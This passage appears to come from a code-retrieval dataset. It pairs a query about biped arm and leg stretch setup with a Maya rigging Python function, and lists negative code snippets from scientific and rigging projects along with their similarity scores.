freq_resp_hi))).real\n \n freq_resp_lo = freq_resps[2] \n lo = np.fft.ifft2(np.fft.fftshift(np.multiply(fourier, freq_resp_lo))).real\n \n freq_resp_bands = freq_resps[1] \n for i in range(numlevels):\n for j in range(numorientations):\n freq_respband = freq_resp_bands[i][j]\n ifourier_band = np.fft.ifft2(np.fft.fftshift(np.multiply(fourier, freq_respband))).real\n bands.append(ifourier_band)\n bands = np.reshape(bands, [numlevels, numorientations, dims[0], dims[1]])\n \n pyr.append(hi)\n pyr.append(bands)\n pyr.append(lo)\n return pyr", "def subtract_linear_bg(region, y_data='final', manual_bg=None, by_min=False, add_column=True, overwrite=True):\n\n def calculate_line(min_position):\n \"\"\"Helper function to calculate the line cross the whole\n spectrum given coordinates of two points and \"left\" or \"right\" value\n of min_position to know in which direction the line must be extended\n \"\"\"\n # School algebra to calculate the line coordinates given two points\n if min_position == \"right\": # Line from left end to min\n x1 = energy[0]\n x2 = energy[counts_min_index]\n y1 = counts[0]\n y2 = counts_min\n slope = (y1 - y2) / (x1 - x2)\n b = (x1 * y1 - x2 * y1) / (x1 - x2)\n line_end = slope * energy[-1] + b\n return np.linspace(counts[0], line_end, len(energy))\n elif min_position == \"left\":\n x1 = energy[counts_min_index]\n x2 = energy[-1]\n y1 = counts_min\n y2 = counts[-1]\n slope = (y1 - y2) / (x1 - x2)\n b = (x1 * y1 - x2 * y1) / (x1 - x2)\n line_end = slope * energy[0] + b\n return np.linspace(line_end, counts[-1], len(energy))\n\n def calculate_manual_bg(x, y, x_intervals):\n left_interval = x_intervals[0]\n right_interval = x_intervals[1]\n # Checking that left is left and right is right. 
Swop otherwise.\n if x[0] > x[-1]:\n if left_interval[0] < right_interval[0]:\n left_interval = x_intervals[1]\n right_interval = x_intervals[0]\n\n left_bg_values = []\n right_bg_values = []\n\n first_left_index = 0\n last_left_index = len(x) - 1\n first_right_index = 0\n last_right_index = len(x) - 1\n for i in range(1, len(x)):\n if (x[i - 1] >= left_interval[0] >= x[i]) or (x[i - 1] <= left_interval[0] <= x[i]):\n first_left_index = i\n if (x[i - 1] >= left_interval[1] >= x[i]) or (x[i - 1] <= left_interval[1] <= x[i]):\n last_left_index = i\n if (x[i - 1] >= right_interval[0] >= x[i]) or (x[i - 1] <= right_interval[0] <= x[i]):\n first_right_index = i\n if (x[i - 1] >= right_interval[1] >= x[i]) or (x[i - 1] <= right_interval[1] <= x[i]):\n last_right_index = i\n\n left_background = y[first_left_index:last_left_index + 1]\n left_average = np.mean(left_background)\n # sum(left_background)/float(len(left_background))\n right_background = y[first_right_index:last_right_index + 1]\n right_average = np.mean(right_background)\n # sum(right_background)/float(len(right_background))\n\n return [left_average, right_average]\n\n counts = region.get_data(column=y_data).tolist()\n energy = region.get_data(column=\"energy\").tolist()\n\n if by_min:\n counts_min = min(counts)\n counts_min_index = counts.index(counts_min)\n # If minimum lies closer to the right side of the region\n if counts_min_index > len(energy) // 2:\n background = calculate_line(\"right\")\n else:\n background = calculate_line(\"left\")\n else:\n if manual_bg:\n line_end_values = calculate_manual_bg(energy, counts, manual_bg)\n background = np.linspace(line_end_values[0], line_end_values[1], len(energy))\n else:\n background = np.linspace(counts[0], counts[-1], len(energy))\n\n if add_column:\n region.add_column(\"no_lin_bg\", counts - background, overwrite=overwrite)\n\n return background", "def contrast_curve_core(\n star_data,\n plate_scale,\n fwhm=1,\n radius_size=None,\n center=None,\n):\n\n # make copy of data array\n data = star_data.copy()\n\n# data = np.abs(data) #DO NOT DO THIS!!!! 
It's making the standard deviation too small later.\n\n ################## establish center ########\n\n x, y = np.indices((data.shape))\n\n if type(center) == type(None):\n center = np.array(\n [(x.max() - x.min()) / 2.0, (y.max() - y.min()) / 2.0]\n )\n\n if type(radius_size) == type(None):\n radius_size = fwhm\n\n ########## set up radial coordinate system ########\n\n radii = np.sqrt((x - center[0]) ** 2 + (y - center[1]) ** 2)\n radii = radii.astype(np.int64)\n\n ones = np.ones_like(data)\n\n number_of_a = int(radii.max() / radius_size)\n\n pie_edges = np.arange(0, 390, 30)\n\n ######## set up aperture array ##########\n center_ap = CircularAperture([center[0], center[1]], radius_size)\n\n all_apers, all_apers_areas, all_masks = (\n [center_ap],\n [center_ap.area],\n [center_ap.to_mask(method=\"exact\")],\n )\n\n all_data, all_weights = [all_masks[0].multiply(data)], [\n all_masks[0].multiply(ones)\n ]\n\n all_stds = [twoD_weighted_std(all_data[0], all_weights[0])]\n\n ######## construct the apertures of the annuli #######\n sigma_clip = SigmaClip(sigma=3.0)\n bkgrms = StdBackgroundRMS(sigma_clip)\n\n medians = np.zeros((number_of_a, len(pie_edges) - 1))\n stds = np.zeros((number_of_a, len(pie_edges) - 1))\n seps = np.zeros(number_of_a)\n for j in range(int(number_of_a)):\n r_in = j * radius_size + fwhm\n r_out = j * radius_size + radius_size + fwhm\n seps[j] = (r_in+r_out)/2.*plate_scale\n\n # terminate if completely outside 10 arcseconds\n if (r_in * plate_scale) > 10:\n break\n\n # create aperture\n aper = CircularAnnulus(\n [center[0], center[1]],\n r_in=r_in,\n r_out=r_out,\n )\n\n # multiply the data by the aperture mask and store it\n all_apers.append(aper)\n all_apers_areas.append(aper.area)\n mask = aper.to_mask(method=\"exact\")\n all_masks.append(mask)\n mask_data = mask.multiply(data)\n\n mask_weight = mask.multiply(ones)\n\n for i, pie_edge_near in enumerate(pie_edges[:-1]):\n pie_edge_far = pie_edges[i + 1]\n mask_data_new = mask_data.copy()\n mask_data_new = check_boundaries(\n mask_data_new, pie_edge_near, pie_edge_far\n )\n medians[j, i] = np.nanmedian(mask_data_new)\n mask_data_masked = mask_data_new[~np.isnan(mask_data_new)]\n\n mean, std = meanclip(mask_data_masked, 3, converge_num=0.2)\n stds[j, i] = std\n\n #Return only the medians and stds for distances within the desired range\n seps = seps[0:j]\n medians = medians[0:j,:]\n stds = stds[0:j,:]\n return seps, medians, stds", "def inverted_hammer(self):\n self.data['inverted_hammer'] = (((self.data['High'] - self.data['Low']) > ((self.data['Open'] - self.data['Close'])*3)) & \\\n ((self.data['High'] - self.data['Close']) / ((.001 + self.data['High'] - self.data['Low']) > 0.6)) & \\\n ((self.data['High'] - self.data['Open']) / ((.001 + self.data['High'] - self.data['Low']) > 0.6)))", "def __init__(self, trap=2.5*10**16, Keq=1.0*10**17,\n EHdecay=1.0*10**-10, Etrap=2.0*10**-10, FHloss=8.0*10**-12,\n G3decay = 0, step=200*ps, pretime=2, reprate=80000000,\n verbose=False, trackQ=False, scalar=1, Gdecay=0, GHdecay=0,\n tolerance=0.005, G2decay=0. 
,Gescape=1., Gform=1., G3loss=0.):\n # Some other variables used\n self.tolerance = tolerance\n self.scalar = scalar\n self.verbose = verbose\n self.reprate = reprate\n self.duration = 1.00 / reprate\n self.step = step\n self.steps = int(self.duration / self.step)\n self.powers = []\n self.pretime = pretime\n # Variables which hold state densities\n self.exciton = []\n self.hole = []\n self.electron = []\n self.trap = (trap) # Total number of traps\n self.filled = [] # Filled traps\n self.signal = []\n self.xsignal = []\n self.ehsignal = []\n self.xloss = []\n self.tloss = []\n self.pulses = []\n self.qk = []\n self.trackQ = trackQ\n # Rate and equilibrium constants, corrected for time step size\n self.Keq = Gescape/Gform # Equilibrium constant for X<-->e+h\n self.EHdecay = (EHdecay * step) # e+h->ground\n self.Etrap = (Etrap * step) # e+trap->filled\n self.FHloss = (FHloss * step) # filled+h->ground\n self.Gdecay = Gdecay * step\n self.G2decay = G2decay * step\n self.G3decay = G3decay * step\n self.GHdecay = GHdecay * step\n self.Gescape = Gescape * step\n self.G3loss = G3loss * step\n self.Gform = Gform * step", "def gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n obj = qad_utils.whatGeomIs(0, geom)\n if (type(obj) != list and type(obj) != tuple):\n objType = obj.whatIs()\n if objType == \"CIRCLE\": # se é cerchio\n newCircle = gripStretchCircle(obj, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newCircle is not None:\n return QgsGeometry.fromPolyline(newCircle.asPolyline(tolerance2ApproxCurve))\n elif objType == \"ARC\": # se é arco\n newArc = gripStretchArc(obj, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newArc is not None:\n return QgsGeometry.fromPolyline(newArc.asPolyline(tolerance2ApproxCurve))\n return None\n \n linearObjectListToStretch = qad_utils.QadLinearObjectList()\n linearObjectListToStretch.fromPolyline(geom.asPolyline())\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n \n pts = linearObjectListToStretch.asPolyline(tolerance2ApproxCurve)\n stretchedGeom = QgsGeometry.fromPolyline(pts) \n \n return stretchedGeom", "def build_schematic(self, bg=None):", "def hdmatrix(self):\n hdmat = np.zeros((len(self.pulsars), len(self.pulsars)))\n\n for i,pulsar1 in enumerate(self.pulsars):\n for j,pulsar2 in enumerate(self.pulsars):\n hdmat[i,j] = 
hellingsdowns_factor(pulsar1, pulsar2)\n self.hdm = hdmat\n return hdmat", "def feet_of_ribbon(d):\n a, b = shortest_two_sides(d)\n return a+a+b+b + d.l * d.w * d.h", "def build_fireball():\n # build the right part\n build_rightpart()\n\n # copy it to 4.\n copy(0, 4)\n\n # build the left part, now it's in 0\n build_leftpart()\n\n # copy right part from 4 to 1.\n copy(4, 1)\n # smash together for whole fireball.\n smash()", "def illuminator_of_elfes():\n\n\t# Alpha - simplified by taking out the i by multiplying the outerproduct by 2i\n\talpha1i = np.matrix([[0, 0, 0, 2], [0, 0, 2, 0], [0, -2, 0, 0], [-2, 0, 0, 0]])\n\talpha2i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, 2], [0, 0, -2, 0]])\n\talpha3i = np.matrix([[0, 0, 2, 0], [0, 0, 0, -2], [-2, 0, 0, 0], [0, 2, 0, 0]])\n\n\t# Betas - simplified by taking out the i by multiplication of outerprod by 2i\n\tbeta1i = np.matrix([[0, 0, 0, 2], [0, 0, -2, 0], [0, 2, 0, 0], [-2, 0, 0, 0]])\n\tbeta2i = np.matrix([[0, 0, 2, 0], [0, 0, 0, 2], [-2, 0, 0, 0], [0, -2, 0, 0]])\n\tbeta3i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, -2], [0, 0, 2, 0]])\n\n\t# print(\"alpha 1\")\n\t# print(alpha1i)\n\t# print(\"\")\n\t# print(\"alpha 2\")\n\t# print(alpha2i)\n\t# print(\"\")\n\t# print(\"alpha 3\")\n\t# print(alpha3i)\n\t# print(\"\")\n\t# print(\"beta 1\")\n\t# print(beta1i)\n\t# print(\"\")\n\t# print(\"beta 2\")\n\t# print(beta2i)\n\t# print(\"\")\n\t# print(\"beta 3\")\n\t# print(beta3i)\n\t# print(\"\")\n\n\t# abperm_comb = [ np.multiply(alpha1i,-1), np.multiply(alpha2i,-1), np.multiply(alpha3i,-1), np.multiply(beta1i,-1), np.multiply(beta2i,-1), np.multiply(beta3i,-1)]\n\n\tabperm_comb = [alpha1i, alpha2i, alpha3i, beta1i, beta2i, beta3i]\n\treturn abperm_comb" ]
[ "0.5521156", "0.52241683", "0.52145356", "0.51717967", "0.5153184", "0.5151809", "0.5132688", "0.5117285", "0.5094757", "0.50800526", "0.5053586", "0.5023979", "0.5008975", "0.50081855", "0.50077236", "0.5004814", "0.49971503", "0.49883208", "0.49845037", "0.49832925", "0.49721703", "0.49566323", "0.4947242", "0.49403057", "0.49342614", "0.49260688", "0.4925075", "0.4924976", "0.49185863", "0.4915794", "0.4912294", "0.49106312", "0.49102575", "0.49069765", "0.490615", "0.4900228", "0.48872647", "0.4885267", "0.48806837", "0.48673055", "0.48658955", "0.4853624", "0.4847098", "0.48439476", "0.48383307", "0.4836354", "0.48359242", "0.48259982", "0.4819269", "0.4814695", "0.4813266", "0.4809128", "0.48053157", "0.48041898", "0.48035708", "0.48012656", "0.48003897", "0.47979215", "0.47975853", "0.4796583", "0.47929555", "0.4790556", "0.4783082", "0.4783069", "0.47640544", "0.47635418", "0.47626352", "0.4760194", "0.4759924", "0.47549647", "0.4752874", "0.4749555", "0.47490725", "0.4747741", "0.4747493", "0.4746359", "0.4746213", "0.47443298", "0.47381848", "0.47360712", "0.47355828", "0.47336796", "0.47336692", "0.47324494", "0.47318545", "0.47283006", "0.47268206", "0.4722404", "0.4718064", "0.47160137", "0.47132134", "0.4712598", "0.47116563", "0.47110346", "0.4705596", "0.47046986", "0.47016972", "0.47015166", "0.46988592", "0.46978125", "0.46954596" ]
0.0
-1
Stretch setup for biped (2 joint chain) arms and legs
def biped_stretch(ik_ctrl, ik_last_node, pv_ctrl, switch_ctrl,
                  up_arm_fk_ctrl, lo_arm_fk_ctrl, wrist_fk_ctrl,
                  up_arm_ik_jnt, lo_arm_ik_jnt, wrist_ik_jnt, ik_handle,
                  pin_attr_name='pinElbow', shift_attr_name='shiftElbow'):

    # add all my attrs on ctrls
    mc.addAttr(ik_ctrl, ln=pin_attr_name, at='double', min=0, max=1, k=1)
    mc.addAttr(ik_ctrl, ln=shift_attr_name, at='double', min=-1, max=1, k=1)
    mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)
    mc.addAttr(ik_ctrl, ln='upStretch', at='double', dv=1, min=0.001, k=1)
    mc.addAttr(ik_ctrl, ln='loStretch', at='double', dv=1, min=0.001, k=1)
    mc.addAttr(up_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)
    mc.addAttr(lo_arm_fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)

    # store initial length of joints
    lo_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')
    wrist_init_length = mc.getAttr(wrist_ik_jnt+'.tx')
    max_init_length = mc.getAttr(lo_arm_ik_jnt+'.tx')+mc.getAttr(wrist_ik_jnt+'.tx')
    lo_abs_init_length = abs(mc.getAttr(lo_arm_ik_jnt+'.tx'))
    wrist_abs_length = abs(mc.getAttr(wrist_ik_jnt+'.tx'))

    # Get parents for ik handle and root of the arm
    arm_root_grp = utils.get_parent(up_arm_ik_jnt)

    # Create distance nodes between base, end, and pv ctrl to get the length of each side of the triangle
    root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node)
    root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl)
    pv_to_end_dist = utils.create_distance_reader(pv_ctrl, ik_last_node)

    # easy stuff first - create fk stretch nodes
    lo_arm_fk_mdl = mc.createNode('multDoubleLinear')
    wrist_fk_mdl = mc.createNode('multDoubleLinear')

    mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx'))
    mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx'))
    mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2')
    mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2')

    utils.connect_abs(lo_arm_fk_mdl+'.output', lo_arm_fk_ctrl+'_ZERO.tx')
    if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl):
        utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx')

    # These are the final fk stretch outputs to connect to joints
    fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output']

    # NOW create nodes for the elbow pin
    lo_arm_pin_mdl = mc.createNode('multDoubleLinear')
    wrist_pin_mdl = mc.createNode('multDoubleLinear')

    mc.setAttr(lo_arm_pin_mdl+'.input1', 1)
    mc.setAttr(wrist_pin_mdl+'.input1', 1)

    if lo_init_length < 0.0:
        mc.setAttr(lo_arm_pin_mdl+'.input1', -1)
    if wrist_init_length < 0.0:
        mc.setAttr(wrist_pin_mdl+'.input1', -1)

    mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2')
    mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2')

    # These are the final elbow pin stretch outputs to connect to joints
    pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output']

    # create shift nodes
    mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1)
    mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1)

    tt = 'linear'
    mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt)
    mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt)
    mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt)
    mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt)
    mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt)
    mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt)

    shift_final_output = [lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength']

    # Create ik individual stretch nodes
    lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear')
    wrist_ik_scale_mdl = mc.createNode('multDoubleLinear')

    mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1')
    mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1')
    mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2')
    mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2')

    # This is the final output for scale and shift
    ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output']

    # Now create the IK auto stretch nodes
    lo_auto_stretch_mdl = mc.createNode('multDoubleLinear')
    wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear')

    auto_stretch_clamp = mc.createNode('clamp')
    mc.setAttr(auto_stretch_clamp+'.minR', 1)
    mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)

    mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1)
    mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1)
    mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')
    mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1)
    mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1)

    adl = mc.createNode('addDoubleLinear')
    mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1')
    mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2')
    utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength')

    # handle soft ik handle constraint override
    pc = mc.pointConstraint(ik_last_node, ik_handle)[0]
    if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'):

        # compensate - feed in new chain length for soft ik chain length
        utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength')

        # blend off the soft ik constraint IF I'm in auto stretch or pin mode
        mdl = mc.createNode('multDoubleLinear')
        utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1')
        utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2')
        mc.connectAttr(mdl+'.output', pc+'.w0')
        utils.connect_reverse(pc+'.w0', pc+'.w1')

    ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output']

    # now create all my blends
    # first blend between FK and an empty ik input
    # (this ik input will take another blend node for blending all the IK options)
    fk_to_ik_blend = mc.createNode('blendColors')
    mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender')
    mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R')
    mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G')

    # now create a blender between auto stretch and the rest of the ik options
    auto_ik_blend = mc.createNode('blendColors')
    mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender')
    mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R')
    mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G')

    # Now connect it to the fk blend
    mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R')
    mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G')

    # now create a blender between pin elbow and the rest of the ik options
    pin_ik_blend = mc.createNode('blendColors')
    mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender')
    mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R')
    mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G')

    # Now connect it to the auto stretch blend
    mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R')
    mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G')

    # now connect the shift and scale
    mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R')
    mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G')

    # now for the magic! Connect the blend network to joints
    mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx')
    mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle):\n\n root_grp = utils.get_parent(jnts[0])\n stretch_jnts = jnts[1:]\n stretch_fk_ctrls = fk_ctrls[1:]\n\n # create attrs\n attrs = ['upStretch','loStretch']\n for i in reversed(range(len(stretch_jnts)-2)):\n ltr = ''\n if i > 0:\n ltr = utils.letters[i]\n\n attrs.insert(1, 'midStretch'+ltr)\n\n if not mc.objExists(ik_ctrl+'.autoStretch'):\n mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1)\n\n for i in range(len(stretch_jnts)):\n if not mc.objExists(ik_ctrl+'.'+attrs[i]):\n mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1)\n\n for fk_ctrl in fk_ctrls[:-1]:\n if not mc.objExists(fk_ctrl+'.stretch'):\n mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1)\n\n # store initial length of joint\n init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts]\n abs_init_lengths = [abs(v) for v in init_lengths]\n\n total_init_length = 0\n for v in init_lengths:\n total_init_length += v\n\n abs_total_init_length = abs(total_init_length)\n\n # Create dist reader\n root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node)\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.addAttr(ik_ctrl, ln='stretchFactor', k=0)\n mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor')\n\n pma = mc.createNode('plusMinusAverage')\n utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(jnts[0]+'.softIkChainLength'):\n\n # compensate chain length - feed in new chain length for soft ik chain length\n utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto stretch\n mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1')\n utils.connect_reverse(pc+'.w1', pc+'.w0')\n\n # easy stuff first - create fk stretch nodes\n fk_to_ik_blends = [] # This is the final output for IK stretch\n\n for i, jnt in enumerate(stretch_jnts):\n\n # easy stuff first - create fk stretch nodes\n fk_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx'))\n mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2')\n utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx')\n\n # Create user secifed IK stretch\n user_ik_scale_mdl = mc.createNode('multDoubleLinear')\n mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i])\n mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2')\n\n # Now create the IK auto stretch nodes\n auto_stretch_mdl = mc.createNode('multDoubleLinear')\n mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i))\n\n fk_to_ik_blend = mc.createNode('blendTwoAttr')\n auto_stretch_blend = mc.createNode('blendTwoAttr')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender')\n mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]')\n mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender')\n mc.connectAttr(user_ik_scale_mdl+'.output', 
auto_stretch_blend+'.input[0]')\n mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]')\n\n fk_to_ik_blends.append(fk_to_ik_blend+'.output')\n\n for i, jnt in enumerate(stretch_jnts):\n mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')", "def ar_addStretchSquash():\n setupName = 'Nose'\n sel = cmds.ls(sl=True)\n chain = cmds.ls(sel[0], dag=True, typ='joint')\n IKSpine = cmds.ikHandle(sj=chain[0], ee=chain[len(chain) - 1], sol='ikSplineSolver')\n # rename\n cmds.rename(IKSpine[0], 'IKSplineHandle_' + setupName)\n cmds.rename(IKSpine[1], 'IKSplineEff_' + setupName)\n cmds.rename(IKSpine[2], 'IKSplineCurve_' + setupName)\n # create new joints.\n cmds.select(cl=True)\n bindStartJt = cmds.joint(n='JtCrvBind01')\n cmds.select(cl=True)\n bindEndJt = cmds.joint(n='JtCrvBind02')\n cmds.delete(cmds.parentConstraint(chain[0], bindStartJt))\n cmds.delete(cmds.parentConstraint(chain[len(chain) - 1], bindEndJt))\n\n cmds.skinCluster(bindStartJt, bindEndJt, 'IKSplineCurve_' + setupName, bm=0, sm=0, nw=1, wd=0, mi=2)\n ctlStart = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '01_CTRL', ch=False)\n extraGrp = cmds.createNode('transform', n='Toony' + setupName + '01ExtraGrp')\n offGrp = cmds.createNode('transform', n='Toony' + setupName + '01OffsetGrp')\n cmds.parent(ctlStart[0], extraGrp)\n cmds.parent(extraGrp, offGrp)\n cmds.delete(cmds.parentConstraint(bindStartJt, offGrp))\n # endJOint\n ctlEnd = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '02_CTRL', ch=False)\n extraGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02ExtraGrp')\n offGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02OffsetGrp')\n cmds.parent(ctlEnd[0], extraGrpEnd)\n cmds.parent(extraGrpEnd, offGrpEnd)\n cmds.delete(cmds.parentConstraint(bindEndJt, offGrpEnd))\n # parent constraint wiht bind joints.\n cmds.parentConstraint(ctlStart[0], bindStartJt)\n cmds.parentConstraint(ctlEnd[0], bindEndJt)\n # Create connection with node basis.\n crvInfo = cmds.createNode('curveInfo', n='curveInfo_Toony' + setupName)\n shpCrv = cmds.listRelatives('IKSplineCurve_' + setupName, s=True)\n cmds.connectAttr(shpCrv[0] + '.worldSpace[0]', crvInfo + '.inputCurve', f=True)\n mdnForSX = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleX')\n mdnForPW = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_Power')\n mdnForYZ = cmds.createNode('multiplyDivide', n='multiplyDivide_Toony' + setupName + '_ScaleYZ')\n cmds.setAttr(mdnForSX + '.operation', 2)\n cmds.setAttr(mdnForPW + '.operation', 3)\n cmds.setAttr(mdnForYZ + '.operation', 